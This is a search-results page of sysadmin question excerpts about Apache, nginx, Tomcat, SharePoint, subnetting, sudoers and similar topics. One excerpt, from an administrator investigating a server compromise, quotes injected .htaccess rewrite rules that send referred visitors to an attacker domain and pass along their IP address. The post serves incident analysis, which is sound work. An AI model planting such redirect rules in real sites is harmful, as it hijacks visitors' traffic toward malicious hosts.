Search Results

Search found 7625 results on 305 pages for 'scraper sites'.

Page 259/305 | < Previous Page | 255 256 257 258 259 260 261 262 263 264 265 266  | Next Page >

  • Apache Server with memcache, varnish and php slow request times

    - by coolestdude1
    My issue is that these servers are taking rather long for request about 2 seconds on average just to serve files. When we had just one server doing everything it was noticeably faster even with the same web app (Drupal 6 and Drupal 7). I want to get this number down to a reasonable level and so I need some help getting to the bottom of why the request times are so slow. This can cause the webapp to hang on post or put and generally leads to a bad user experience on my sites. PS: I am more of a server newbie so this has confounded me for quite some time. The domains: collabornation.net nptrainingworks.com (they run off the same two webservers using vhost configs) The Gear: Two Rackspace 4 Gig servers running CentOS 6.2 Final They have a mounted file system (gluster) that is used to keep files the same on both machines. They are behind a rackspace load balancer running round robin. Mysql is run using php-pdo and php-mysql as such mysql is run on another instance running memcache on that machine with phpMyAdmin located there as well. Apache version number 2.2.15-15.el6.centos.1 (httpd.x86_64) Varnish version number 3.0.2-1.el5 (varnish.x86_64) PHP version number 5.3.14-1.el6.remi (php.x86_64) Configs Linked Below Apache Conf Vhost Conf Varnish Backends Varnish Defaults Varnish Acl PHP INI Again need some help, much appreciated!

    Read the article

  • Transferring domain from one registrar to another

    - by Macha
    I have a domain from my old web host, which was free with my hosting account. After a few years, I am moving to a VPS. Most of my other domains were registered with Namecheap, so it was just a matter of changing a few DNS records. However, given that my old host does not provide me with a DNS control panel, and I don't want to be paying a full hosting bill for just domains, I'm now looking into transferring it. My old host says there will be a charge of $15 to them. NameCheap's page seems to imply you don't need the current registrar to do anything, but it also seems to be based on sending an email to the one listed in whois. Of course, my old host have whoisguard on the domain so the only email on it is [email protected] (and not a unique [email protected], just [email protected]) which doesn't go to me. Again, there doesn't seem to be an option to disable this. So, is it a case of paying my old host's fee, and paying again for the domain from NameCheap, or is there some other way to transfer my domain? (I'm not really sure which of the trilogy sites this is best for.)

    Read the article

  • How to access XAMPP virtual hosts from iPad on local network?

    - by martin's
    Using XAMPP on one machine. Multiple virtual hosts defined. One per project. Format is .local For example: apple.local microsoft.local client-site.local our-own-internal-site.local All works perfectly from that one machine. I now want to have other systems within the network access the various sites. The main reason for wanting to do this is to be able to test site functionality and layout from mobile devices without having to upload partial work to public servers. I can access the main XAMPP default site by simply entering the IP address of the XAMPP machine in, say, Safari on an iPad. However, there is no way to reach .local that I can see. Would this entail setting up a DNS server within the network? We have a mixture of Windows and Mac machines. No Linux. The XAMPP machine is Vista 64. I don't want real external internet access to be affected in any way, just ".local" pointed to the XAMPP machine if that makes sense.

    Read the article

  • Firefox Does NOT get local site cookie

    - by Campo
    This is a weird one. We have a production server (Server 2008) and two staging servers (Server 2008 and Server 2003) I have sites on all of these. They all use cookies. On the Production server when browsing to our site www.supernovainteractive.com there is a cookie that detects when you visted the site and it will not refresh the logo animation (top left hand side) on clicking to another page. This works for all browsers on the production server. I’m not sure what’s going on but for some reason cookies are not working on one site in the 2008 staging server only. This is when browsing using Firefox (3.6.3) they work fine on all other browsers (IE, Chrome, Safari, Opera) In addition, the 2003 staging server works fine. You can test on the Supernova Interactive site by noticing the logo in the top left corner. It uses a cookie to detect if you’ve already seen the animation. Once you’ve seen it once, it doesn’t animate again until tomorrow. Currently, it’s animating every time. I have opened an outside facing port so others can see the issue. Http://exchange.supernova.com:10009 Any ideas on this one? Firewalls are off on the server. Notice you do not get a cookie from Exchange.supernova.com.

    Read the article

  • Customer site is out of IP addresses, they want to go from /24 to /12 netmask... Bad idea?

    - by ewwhite
    One of my client sites called to ask me to change the subnet masks of the Linux servers I manage there while they re-IP/change the netmask of their network based on a 10.0.0.x scheme. "Can you change the server netmasks from 255.255.255.0 to 255.240.0.0?" You mean, 255.255.240.0? "No, 255.240.0.0." Are you sure you need that many IP addresses? "Yeah, we never want to run out of IP addresses." A quick check against the Subnet Cheat Sheet shows: a 255.255.255.0 netmask, a /24 provides 256 hosts. It's clear to see that an organization can exhaust that number of IP addresses. a 255.240.0.0 netmask, a /12 provides 1,048,576 hosts. This is a small < 200-user site. I doubt that they'd allocate more than 400 IP addresses. I suggested something that provides fewer hosts, like a /22 or /21 (1024 and 2048 hosts, respectively), but was unable to give a specific reason against using the /12 subnet. Is there anything this customer should be concerned about? Are there any specific reasons they shouldn't use such an incredibly large mask in their environment?

    Read the article

  • How can I make the Firefox Password Manager more intelligent?

    - by Philip
    I have two major gripes about the FF password manager: If I restore a session with multiple tabs with sites with saved passwords, the master password prompt pops up once for each of them, even if I correctly enter the password the first time. Sometimes I want Firefox not to use my saved passwords at all (e.g. because I want to let someone else use it without getting access to my accounts), but hitting cancel results in erratic behavior--sometimes the box just pops up again and again, or sometimes it stops and behaves as I wish (continuing to browse w/o my passwords) until it encounters another site that wants my password. Thus even when hitting cancel does leave me free to browse passwordless, it doesn't get Firefox to leave me alone for the whole session. Thus: do you know of any tweak or add-on that could (1) make Firefox smart enough to get my master password once and then leave me alone, and/or (2) add an option (checkbox-style, toggle button, etc.) to browse "for now" (until I toggle the option) or even "for this session" (until I restart) without using any of my saved passwords? I'm running Firefox 3.5.6 on Mac OS X 10.5; thanks.

    Read the article

  • Firefox: Clear History Is SUPER EFFECTIVE?

    - by acidzombie24
    I'm seeing a performance problem on certain sites (like gmail) which clearing the history should not affect. Is this a website problem or a firefox problem and what can i do to fix it w/o clearing my history? Also as a webdeveloper i am interested in how to make this happen (or not happen). I'm using firefox 8 and i confirmed the problem by copying my profile to firefox 11 (portable). To reproduce go to gmail.com and sign in. Have your task manager open. Once you click signin or hit enter gmail will bring up your emails. Keep your eye on the CPU usage. I checked and right now on this machine its using all my CPU for 22seconds!!!! Yes. 22 seconds. Once i cleared my "browser & download history" Its <6seconds. WTF. I have no idea why or how the size of history and CPU usage when loading up gmail are correlated. I have firefox setup so it never clears the history. But... 22seconds is a disaster. Can someone explain why this is happening or a fix that isnt clearing my history? I tried visiting a few websites and only gmail eats up that much CPU. Most websites only take <5sec of max CPU. So maybe this is a gmail problem? Or a firefox problem that gmail happens to hit? I still dont understand why it happens. -edit- I forgot to mention places.sqlite is 90mb. I dont think that matters. I have a sqlite file 400mb which is pretty much 2 large tables. It has no performance issues

    Read the article

  • Sharepoint: authenticating users via forms authentication

    - by sbee
    My problem is the following(sharepoint Newbie) , i want to change the default zone from being a Windows Authenticated Zone to a Forms Authenticated Zone ,thereby forcing the site collection administrator to log in via forms authentication and not windows also the sharepoint users will be accesing the site internally my goal is to effectively replace windows authentication with forms authentication as my company does not have active directory installed. So far i have created an ASP Application that adds the users to the database,the database was created via the .Net Framework Asp tool(Asp reg_sql),however when i change the default zone to the AspNetSqlMembershipProvider(Forms) and attempt to add my site collection administrator via the Central admistrator, i get the following error "No Exact Match found" as shown on the screenshot. My inkling is that somehow the people picker is failing to read the users from the database but reasearch on correcting that thus far has proved fruitless. I have made all the relevant changes on the these sites(Central admin site,My test site & Add Users site) config files.Changes are the following(Membeship Provider,Connection String,People Picker) i left out the role provider for now as it is optional. Help on this would ge highly appreciated...

    Read the article

  • Serving static content with Apache web server and Tomcat

    - by Hunter
    I've configured Apache web server and Tomcat like this: I created a new file in apache2/sites-available, named it "myDomain" with this content: <VirtualHost *:80> ServerAdmin [email protected] ServerName myDomain.com ServerAlias www.myDomain.com ProxyPass / ajp://localhost:8009 <Proxy *> AllowOverride AuthConfig Order allow,deny Allow from all Options -Indexes </Proxy> </VirtualHost> Enabled mod_proxy and myDomain a2enmod proxy_ajp a2ensite myDomain Edited Tomcat's server.xml (inside the Engine tag) <Host name="myDomain.com" appBase="webapps/myApp"> <Context path="" docBase="."/> </Host> <Host name="www.myDomain.com" appBase="webapps/myApp"> <Context path="" docBase="."/> </Host> This works great. But I don't like to put static files (html, images, videos etc.) into {tomcat home}/webapps/myApp's subfolders instead I'd like to put them the apache webserver's root WWW directory's subdirectories. And I'd like Apache web server to serve these files alone. How could I do this? So all incoming request will be forwarded to Tomcat except those that ask for a static file.

    Read the article

  • Apache2 doesn't serve PHP-scripts correctly [closed]

    - by cmbrnt
    I've run into a problem with my Apache 2.2.16 configuration, running on Debian Squeeze. The problem is that it stopped serving PHP5-scripts completely. When I try to access the sites with Google Chrome, it instead downloads a file called "download", which contains the contents of the script. This is of course not a good thing. It does serve common html-files perfectly... I've been at this for quite a while now, and after all the googling and troubleshooting, I thought it would be a good time to ask you guys. Here's what I've got: The php5 and libapache2-mod-php5 packages are installed /etc/apache2/mods-available contains both php5.load and php5.conf, and these are symlinked from the mods-enabled directory The /etc/php5/ directory is left untouched since the installation. Here's the contents of /etc/apache2/mods-available/php.load: LoadModule php5_module /usr/lib/apache2/modules/libphp5.so And /etc/apache2/mods-available/php.conf: <IfModule mod_php5.c> <FilesMatch "\.ph(p3?|tml)$"> SetHandler application/x-httpd-php </FilesMatch> <FilesMatch "\.phps$"> SetHandler application/x-httpd-php-source </FilesMatch> <IfModule mod_userdir.c> <Directory /home/*/public_html> php_admin_value engine Off </Directory> </IfModule> </IfModule> What am I missing? This is a server with modified virtual hosts and the like, so I might have changed some settings which causes this problem, but simply purging and reinstalling is not an option so far, since the configuration is quite extensive. Any help would be great. Thanks.

    Read the article

  • 404 with serving static files in a custom nginx configuration

    - by code90
    In my nginx configuration, I have the following: location /admin/ { alias /usr/share/php/wtlib_4/apps/admin/; location ~* .*\.php$ { try_files $uri $uri/ @php_admin; } location ~* \.(js|css|png|jpg|jpeg|gif|ico|pdf|zip|rar|air)$ { expires 7d; access_log off; } } location ~ ^/admin/modules/([^/]+)(.*\.(html|js|json|css|png|jpg|jpeg|gif|ico|pdf|zip|rar|air))$ { alias /usr/share/php/wtlib_4/modules/$1/admin/$2; } location ~ ^/admin/modules/([^/]+)(.*)$ { try_files $uri @php_admin_modules; } location @php_admin { if ($fastcgi_script_name ~ /admin(/.*\.php)$) { set $valid_fastcgi_script_name $1; } fastcgi_pass $byr_pass; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME /usr/share/php/wtlib_4/apps/admin$valid_fastcgi_script_name; fastcgi_param REDIRECT_STATUS 200; include /etc/nginx/fastcgi_params; } location @php_admin_modules { if ($fastcgi_script_name ~ /admin/modules/([^/]+)(.*)$) { set $byr_module $1; set $byr_rest $2; } fastcgi_pass $byr_pass; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME /usr/share/php/wtlib_4/modules/$byr_module/admin$byr_rest; fastcgi_param REDIRECT_STATUS 200; include /etc/nginx/fastcgi_params; } Following is the requested url which ends up with "404": http://www.{domainname}.com/admin/modules/cms/styles/cms.css Following is the error log: [error] 19551#0: *28 open() "/usr/share/php/wtlib_4/apps/admin/modules/cms/styles/cms.css" failed (2: No such file or directory), client: xxx.xxx.xxx.xxx, server: {domainname}.com, request: "GET /admin/modules/cms/styles/cms.css HTTP/1.1", host: "www.{domainname}.com" Following urls works fine: http://www.{domainname}.com/admin/modules/store/?a=manage http://www.{domainname}.com/admin/modules/cms/?a=cms.load Can anyone see what the problem could be? Thanks. PS. I am trying to migrate existing sites from apache to nginx.

    Read the article

  • Client cannot access my IIS7 web server

    - by Soccerwiz
    I have a Windows 2008 web server on running IIS 7 with about 25 websites. One of those sites is an SaaS application that is accessed constantly throughout the day. However, one particular client keeps getting blocked from my server. They will be using the service, and then all of a sudden they cannot access the program, or any other site on the server. The entire office of 4 users is blocked from accessing anything on the web server. A trace route reveals they get all the way to the server before they are blocked. However, they can access a linux server that is a different VM with a different IP on the same physical server. Also, when they are blocked from their office, they can still access the site from their mobile phone or local Starbucks. They can also occasionally reset the router and gain access to the web server again as they are on a dynamic IP address. I checked IIS and allow all IPs to access the server. There is nothing in the logs the says anything about a user being banned. I really have no idea what is causing this? Could it be a virus on their end? I have even moved the SaaS to a completely new server in a different location, and they were working fine for about a month, and then the problem started occurring again. Are there any hidden blacklists in IIS? Or is it a routing issue on their end?

    Read the article

  • finding files that match a precise size: a multiple of 4096 bytes

    - by doub1ejack
    I have several drupal sites running on my local machine with WAMP installed (apache 2.2.17, php 5.3.4, and mysql 5.1.53). Whenever I try to visit the administrative page, the php process seems to die. From apache_error.log: [Fri Nov 09 10:43:26 2012] [notice] Parent: child process exited with status 255 -- Restarting. [Fri Nov 09 10:43:26 2012] [notice] Apache/2.2.17 (Win32) PHP/5.3.4 configured -- resuming normal operations [Fri Nov 09 10:43:26 2012] [notice] Server built: Oct 24 2010 13:33:15 [Fri Nov 09 10:43:26 2012] [notice] Parent: Created child process 9924 [Fri Nov 09 10:43:26 2012] [notice] Child 9924: Child process is running [Fri Nov 09 10:43:26 2012] [notice] Child 9924: Acquired the start mutex. [Fri Nov 09 10:43:26 2012] [notice] Child 9924: Starting 64 worker threads. [Fri Nov 09 10:43:26 2012] [notice] Child 9924: Starting thread to listen on port 80. Some research has led me to a php bug report on the '4096 byte bug'. I would like to see if I have any files whose filesize is a multiple of 4096 bytes, but I don't know how to do that. I have gitBash installed and can use most of the typical linux tools through that (find, grep, etc), but I'm not familiar enough with linux to figure it out on my own. Little help?

    Read the article

  • Servers - Buying New vs Buying Second-hand

    - by Django Reinhardt
    We're currently in the process of adding additional servers to our website. We have a pretty simple topology planned: A Firewall/Router Server infront of a Web Application Server and Database Server. Here's a simple (and technically incorrect) diagram that I used in a previous question to illustrate what I mean: We're now wondering about the specs of our two new machines (the Web App and Firewall servers) and whether we can get away with buying a couple of old servers. (Note: Both machines will be running Windows Server 2008 R2.) We're not too concerned about our Firewall/Router server as we're pretty sure it won't be taxed too heavily, but we are interested in our Web App server. I realise that answering this type of question is really difficult without a ton of specifics on users, bandwidth, concurrent sessions, etc, etc., so I just want to focus on the general wisdom on buying old versus new. I had originally specced a new Dell PowerEdge R300 (1U Rack) for our company. In short, because we're going to be caching as much data as possible, I focussed on Processor Speed and Memory: Quad-Core Intel Xeon X3323 2.5Ghz (2x3M Cache) 1333Mhz FSB 16GB DDR2 667Mhz But when I was looking for a cheap second-hand machine for our Firewall/Router, I came across several machines that made our engineer ask a very reasonable question: If we stuck a boat load of RAM in this thing, wouldn't it do for the Web App Server and save us a ton of money in the process? For example, what about a second-hand machine with the following specs: 2x Dual-Core AMD Opteron 2218 2.6Ghz (2MB Cache) 1000Mhz HT 16GB DDR2 667Mhz Would it really be comparable with the more expensive (new) server above? Our engineer postulated that the reason companies upgrade their servers to newer processors is often because they want to reduce their power costs, and that a 2.6Ghz processor was still a 2.6Ghz processor, no matter when it was made. Benchmarks on various sites don't really support this theory, but I was wondering what server admin thought. Thanks for any advice.

    Read the article

  • sudoer scheme to allow useful access to another web developer yet retain future control of a virtual

    - by Tchalvak
    Background: Virtual Private Server I have a virtual private server that I'm looking to host multiple websites on, and provide access to another web developer. I don't care about putting too many constraints on him, though I wouldn't mind isolating the site that he'll be developing from other sites on the server that I will develop. The problem: retain control Mainly what I want is to make sure that I retain control over the server in the future. I want to reserve the ability to create/promote/demote and other administrative functions that don't deal with web software. If I make him an admin, he can sudo su - and become root and remove root control from me, for example. I need him not to be able to: take away other admin permissions change the root password have control over other security/administrative functions I would like him to still be able to: install software (through apt-get) restart apache access mysql configure mysql/apache reboot edit web development configuration type files in /etc/ Other Standard Setups would be happily considered I've never really set up a good sudoers file, so simple example setups would be very useful, even if they're only somewhat similar to the settings that I'm hoping for above. Edit: I have not yet finalized permissions, so standard, useful sudo setups are certainly an option, the lists above are more what I'm hoping I can do, I don't know that that setup can be done. I'm sure that people have solved this type of problem before somehow, though, and I'd like to go with something somewhat tested as opposed to something I've homegrown.

    Read the article

  • Apache RewriteEngine, redirect sub-directory to another script

    - by Niklas R
    I've been trying to achieve this since about 1.5 hours now. I want to have the following transformations when requesting sites on my website: homepage.com/ => index.php homepage.com/archive => index.php?archive homepage.com/archive/site-01 => index.php?archive/site-01 homepage.com/files/css/main.css => requestfile.php?css/main.css The first three transformations can be done by using the following: RewriteEngine on RewriteRule ^/?$ index.php RewriteRule ^/?(.*)$ index.php?$1 However, I'm stuck at the point where all requests to the files subdirectory should be redirected to requestfile.php. This is one of the tries I've done: RewriteEngine on RewriteRule ^/?$ index.php RewriteRule ^/?files/(.+)$ requestfile.php?$1 RewriteRule ^/?(.*)$ index.php?$1 But that does not work. I've also tried to put [L] after the third line, but that didn't help as I'm using this configuration in .htaccess and sub-requests will transform that URL again, etc. I fuzzed with the RewriteCond command but I couldn't get it to work. How needs the configuration to look like to achieve what I desire?

    Read the article

  • How to tell nginx to honor backend's cache?

    - by ChocoDeveloper
    I'm using php-fpm with nginx as http server (I don't know much about reverse proxies, I just installed it and didn't touch anything), without Apache nor Varnish. I need nginx to understand and honor the http headers I send. I tried with this config (taken from the docs) but didn't work: /etc/nginx/nginx.conf: fastcgi_cache_path /var/lib/nginx/cache levels=1:2 keys_zone=website:10m inactive=10m; fastcgi_cache_key "$scheme$request_method$host$request_uri"; /etc/nginx/sites-available/website: server { fastcgi_cache website; #fastcgi_cache_valid 200 302 1h; #fastcgi_cache_valid 301 1d; #fastcgi_cache_valid any 1m; #fastcgi_cache_min_uses 1; #fastcgi_cache_use_stale error timeout invalid_header http_503; add_header X-Cache $upstream_cache_status; } I always get "MISS" and the cache dir is empty. If I uncomment the other directives, I get hit, but I don't want those "dumb" settings, I need to control them within my backend. For example, if my backend says "public, s-maxage=10", the cache should be considered stale after 10 secs. Instead, nginx will store it for 1h, because of these directives. I was thinking whether I should try proxy_cache, not sure what's the difference. In both fastcgi and proxy modules docs it says this: The cache honors backend's Cache-Control, Expires, and etc. since version 0.7.48, Cache-Control: private and no-store only since 0.7.66, though. Vary handling is not implemented. nginx version: nginx/1.1.19 Any thoughts? pd: I also have the reverse proxy that is offered by Symfony2 (which I turn off to use nginx's). The headers are interpreted correctly by it, so I think I'm doing it right.

    Read the article

  • mod_rewrite redirect subdomain to folder

    - by kitensei
    I have a wordpress blog at the url http://www.orpheecole.com, I would like to setup 3 subdomains (cycle1, cycle2, cycle3) being redirected to their folders (1 subdomain = 1 wp blog, no multisite enabled) The file tree looks like this: /var/www/orpheecole.com/ /var/www/cycle1.orpheecole.com/ /var/www/cycle2.orpheecole.com/ /var/www/cycle3.orpheecole.com/ the following .htaccess try to redirect to /var/www/orpheecole.com/cycleX instead of its own directory, but id it's possible i'd rather redirect every subdomain to its own www folder. my sites-enabled file for main site is # blog orpheecole <VirtualHost *:80> ServerAdmin [email protected] ServerName orpheecole.com ServerAlias *.orpheecole.com DocumentRoot /var/www/orpheecole.com/ <Directory /var/www/orpheecole.com/> Options -Indexes FollowSymLinks MultiViews Order allow,deny allow from all </Directory> ErrorLog /var/log/apache2/orpheecole.com-error_log TransferLog /var/log/apache2/orpheecole.com-access_log </VirtualHost> and the .htaccess located on /var/www/orpheecole.com/ looks like this <IfModule mod_rewrite.c> RewriteEngine on RewriteCond %{HTTP_HOST} !^www.* [NC] RewriteCond %{HTTP_HOST} ^([^\.]+)\.orpheecole\.com$ RewriteCond /var/www/orpheecole.com/%1 -d RewriteRule ^(.*) www\.orpheecole\.com/%1/$1 [L] # BEGIN WordPress RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] # END WordPress </IfModule> I tried to remove wordpress directives but nothing change, and the rewrite mod is enabled and working.

    Read the article

  • Dual hard drive Windows 7 system, modified the registry to get programs to install on second drive, now IE doesn't work

    - by paul
    I have a dual hard drive Windows 7 system, Windows is installed on an SSD (C:) and I modified the registry to try to force programs to install on second HDD drive (another letter). The registry edits are pretty simple, just a few keys in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion to change the drive letter. For the most part the system is very fast and works great, but IE doesn't work anymore. With IE10, it opens for a flash with a white window then closes. I tried installed IE11 which opens a white window for a few seconds, doesn't respond, then crashes. I've tried all the solutions I could find. This includes resetting the IE settings, "uninstalling" and re-installing IE, which is just turning it on and off in "Turn Windows Features on or off", copying the Program Files\Internet Explorer files onto both/either drives, changing the registry keys back to use C:, lots of rebooting, and safe mode. Nothing has worked. I don't see errors in the event viewer, but I might not know what to look for. Any ideas on how to get IE running? I don't need IE for daily browsing, I just need it for cross-browser testing on sites I build and on the rare occasion a page only works in IE. I don't really want to use a virtual machine, but would be ok with something standalone like tredosoft's, but I'm not aware of something like that for current versions of IE.

    Read the article

  • Finding Webserver Vulnerability

    - by Brent
    We operate a webserver farm hosting around 300 websites. Yesterday morning a script placed .htaccess files owned by www-data (the apache user) in every directory under the document_root of most (but not all) sites. The content of the .htaccess file was this: RewriteEngine On RewriteCond %{HTTP_REFERER} ^http:// RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR} Googling for that url (which is the md5 hash of "antivirus") I discovered that this same thing happened all over the internet, and am looking for somebody who has already dealt with this, and determined where the vulnerability is. I have searched most of our logs, but haven't found anything conclusive yet. Are there others who experienced the same thing that have gotten further than I have in pinpointing the hole? So far we have determined: the changes were made as www-data, so apache or it's plugins are likely the culprit all the changes were made within 15 minutes of each other, so it was probably automated since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site) if an .htaccess file already existed and was writeable by www-data, then the script was kind, and simply appended the above lines to the end of the file (making it easy to reverse) Any more hints would be appreciated.

    Read the article

  • Can I use HP Recovery Discs for a different hard drive capacity and make?

    - by Fasih Khatib
    About two years ago I created HP Recovery Discs (3 of them). Now my hard drive has crashed and new one is still a week from delivery. I was reading up on how to reinstall the genuine OS using the Recovery Discs as i was not given any Windows 7 installation discs. I did my bit of research after getting answers from the community on what these discs do and found out on other sites that people experience issues when recovering their OS from the disc. Especially when they change the make or capacity of the harddrive. Unfortunately I had to change the make as the hard drive that came built in has gone out of production. This question is just a part of my checklist to avoid problems when recovering the OS. I have: HP DV4-2126TX (available only in India I guess) I had: Seagate Momentus 320 GB I ordered: Western Digital Scorpio Black 500 GB Windows 7 Home Premium 32-bit Is there a possibility to encounter any problems due to the changed capacity and make? I only want my genuine OS and drivers – not my data. I was told that Disc 1 contained the OS and drivers, and the rest of the discs contained data. I couldn't verify that.

    Read the article

  • suPHP not working

    - by amarc
    OS: Ubuntu 10.04 etc/suphp/suphp.conf: [global] ;Path to logfile logfile=/var/log/suphp/suphp.log ;Loglevel loglevel=info ;User Apache is running as webserver_user=www-data ;Path all scripts have to be in docroot=/home ;Path to chroot() to before executing script ;chroot=/mychroot ; Security options allow_file_group_writeable=false allow_file_others_writeable=false allow_directory_group_writeable=false allow_directory_others_writeable=false ;Check wheter script is within DOCUMENT_ROOT check_vhost_docroot=true ;Send minor error messages to browser errors_to_browser=false ;PATH environment variable env_path=/bin:/usr/bin ;Umask to set, specify in octal notation umask=0077 ; Minimum UID min_uid=100 ; Minimum GID min_gid=100 [handlers] ;Handler for php-scripts application/x-httpd-suphp="php:/usr/bin/php-cgi" ;Handler for CGI-scripts x-suphp-cgi="execute:!self" some vhost in sites-enabled: NameVirtualHost *:8080 <VirtualHost *:8080> ServerAdmin ... ServerName ... ServerAlias ... AddType application/x-httpd-php .php AddHandler application/x-httpd-php .php suPHP_Engine on suPHP_UserGroup user user suPHP_ConfigPath "/home/user/etc" suPHP_PHPPath /usr/bin DocumentRoot /home/user/web/site.com/ ErrorLog /var/log/apache2/site.com-error_log CustomLog /var/log/apache2/site.com-access_log common <Directory /home/user/web/site.com/> Order Deny,Allow Allow from all Options +Indexes </Directory> </VirtualHost> But when I did nano /home/user/web/id.php and paste <?php system('id'); ?> in it, result I get is: uid=33(www-data) gid=33(www-data) groups=33(www-data) Have no idea what to do so I was hoping comunity could help ty.

    Read the article

  • Automatically update SVN repository on another server

    - by Mikey C
    We have 2 Ubuntu web servers, one of which is our staging server (Staging) and the other is our live server (Live). Staging has our Subversion repository, as well as the latest version of our sites on it. Because the SVN server is running on Staging, I've added post-commit hook scripts so that the staging server automatically has the latest code. Easy. However, I'd like one of the repositories on Live to also stay updated. This is a repository of images, PDFs and suchlike. When a team member commits to this, I'd like it to automatically update on the live servers so it can be used in mailings, content managed pages etc. I'd add something to the post-commit to SSH across and update, but for security, we can only SSH from one server to another as user 'commandLine', whereas the 'www-data' user runs the post-commit. I'd rather not run a cron on Live to update every 5 minutes, but I can't see another way of doing it without altering all our user permissions. Any ideas?

    Read the article

  • The Web Hosting Connundrum for "not quite" developers

    - by saltcod
    Hey all, Apologies if this post feels like its been covered elsewhere, but I don't think it has. I've been down a winding web hosting road. To date, I've tried: Joyent, Media Temple, Bluehost, Hostgator, and finally Linode. The reason for switching are likely obvious to everyone: speed. With the exception of the lightening fast Linode, all of the shared hosts are absolutely sloooow. What do do when you're not really a "developer" While I'v grown addicted to the speed of Linode, I really don't feel like its where I should be. I have this nagging feeling in the back of my mind that one of these days (likely soon), I'm going to run into something that i won't be able to figure out and i'll have days worth of downtime. Just the other day, for example, I realized that one of my domains wasn't sending emails. After 4(!) hours looking into the problem, I still can't get sendmail or postfix to work. Four hours!! I want to be a Drupal expert, not a Ubuntu expert That's really the heart of my problem: I spend way too much time learning Ubuntu's ins-and-outs, and not nearly enough time working on Drupal. So here goes: Is there a web host out there anywhere that offers the speed of Linode, but will let me focus on Drupal instead of sys-admin-ing? Thanks! [ I know, I know. There are going to be lots of people who read this saying - "just learn Ubuntu like a real developer". And I get that. I do. But when I work full-time and try and develop some of these sites in my evenings and weekends, I'm really feeling like the sys-admin stuff gets in the way.

    Read the article

  • How to add a writable folder to the PHP document root on linux

    - by Ron Whites
    We are building an example bash script for our PHP TestCoverage Tool use on Linux. The development environment is Ubuntu 12.04_1 but we intend to have the linux example work across as many linux versions as possible without modification. The example linux script requires a variable be set to the PHP Document Root path and by default uses a small PHP example source to show the user how our GUI and text report shows the covered and uncovered PHP code areas. The linux script is also intended to be easily alterable by the user to automate the TestCoverage display of users PHP code. The problem we are having with Ubuntu 12.04 (any linux?) is that the PHP Apache2 document root is defined in /etc/apache2/sites-available/default as /var/www and /var/www is defaulted with "drwxr-xr-x" read only access. So in order to add our own folder as /var/www/SDTestCoverage we must change /var/www to "drwxrwxrwx" read-write access. So it seems our script (at least on Ubuntu) will need to ... 1. acquire and save the /var/www permissions then do .. 2. sudo chmod 777 /var/www (to make writable) 3. mkdir -p /var/www/SDTestCoverage (create our folder under the document root) 4. sudo chmod 777 /var/www/SDTestCoverage (make our subfolder writable) 5. and finally restore /var/www permissions Thanks and our Questions are .. 1. Is this the standard way (using Ubuntu) one adds a writable folder under the PHP Document Root? 2. Is this the most general purpose way one adds a writable folder under the PHP Document Root on other versions of Linux?

    Read the article

< Previous Page | 255 256 257 258 259 260 261 262 263 264 265 266  | Next Page >